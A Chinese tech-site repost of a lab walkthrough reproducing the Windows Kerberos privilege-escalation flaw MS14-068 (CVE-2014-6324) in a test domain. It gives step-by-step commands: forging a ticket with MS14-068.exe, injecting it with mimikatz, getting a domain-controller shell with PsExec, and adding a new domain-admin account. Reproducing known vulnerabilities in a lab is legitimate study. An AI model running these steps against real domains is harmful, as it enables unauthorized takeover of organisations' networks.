IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 开发工具 -> 域渗透??MS14-068??漏洞复现 -> 正文阅读

[开发工具]域渗透??MS14-068??漏洞复现

0x01 漏洞介绍

  1. 漏洞概述:
    该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。
  2. 漏洞编号
    CVE-2014-6324
  3. 受影响版本
    全部版本Windows服务器

0x02 环境准备

该实验全部资料:
链接:https://pan.baidu.com/s/1hanffVXLpS_rXw4IQ8f1kw
提取码:ten4

域—test.com
域控:win 2008 R2 192.168.30.201
域内主机:win 7 192.168.30.202

漏洞利用思路:
1、首先利用ms14-068提权工具生成伪造的kerberos协议认证证书(黄金票据)
2、利用mimikatz.exe将证书写入,从而提升为域管理员
3、测试是否能访问域控C盘目录,能访问则说明提升为域管理员
4、利用PsExec.exe获取域控shell,添加用户并将其加入域管理员组

0x03 漏洞复现

1. 查看当前用户是否为域用户

net user zsf /domain

在这里插入图片描述
该用户为域内主机

2. 获取域控信息

net group “domain controllers” /domain

在这里插入图片描述
通过ping域控主机名,得到域控ip, 一般在域内得到的ip基本都为真实ip,
在这里插入图片描述
注意:ping的时候一定要将域控主机名后面的$去掉

3. 查看目前权限

尝试访问域控的C盘,但是拒绝访问

dir \\WIN-PO3UMM3O74H.test.com\C$

在这里插入图片描述

4. “MS14-068” 工具生成票据

这里我们要用到 “MS14-068” 工具复现此漏洞,我们需要获取当前域机器的域用户名、密码、用户sid等信息。

4.1在github上下载一个ms14-068工具到win7里
在这里插入图片描述

4.2 获取用户sid:

whoami /user

在这里插入图片描述

4.3 执行下列命令,会在当前目录生成一个cache文件(票据)
我们是已经拿下了域内的win7主机,所以密码是提前已知的,真实环境不知道的话可以使用mimikatz等工具进行查看

MS14-068.exe -u zsf@test.com -p 123.com -s S-1-5-21-3649406501-1625577053-2855085541-1104 -d WIN-PO3UMM3O74H.test.com

在这里插入图片描述
生成下面的这样一个票据
在这里插入图片描述

5. 打开mimikatz,注入票据

8.1 清空当前凭证,为了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除

kerberos::purge

在这里插入图片描述
8.2 查看当前机器凭证,是否已经被清空

kerberos::list

在这里插入图片描述

8.3 将上一步生成的票据注入到内存中

kerboseos::ptc D:\TGT_zsf@test.com.ccache

在这里插入图片描述
注入成功

6. 验证权限是否提升

在这里插入图片描述

7. 使用PsExec.exe获取一个交互式shell

PsExec.exe \\WIN-PO3UMM3O74H.test.com cmd

在这里插入图片描述获取成功,拿到权限

8. 创建用户,并添加至域管理员组

net user abc 456.admin /add /domain
net group "Domain admins" abc /add /domain

在这里插入图片描述
成功复现

  开发工具 最新文章
Postman接口测试之Mock快速入门
ASCII码空格替换查表_最全ASCII码对照表0-2
如何使用 ssh 建立 socks 代理
Typora配合PicGo阿里云图床配置
SoapUI、Jmeter、Postman三种接口测试工具的
github用相对路径显示图片_GitHub 中 readm
Windows编译g2o及其g2o viewer
解决jupyter notebook无法连接/ jupyter连接
Git恢复到之前版本
VScode常用快捷键
上一篇文章      下一篇文章      查看所有文章
加:2021-09-12 13:21:20  更:2021-09-12 13:21:30 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 4:22:10-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码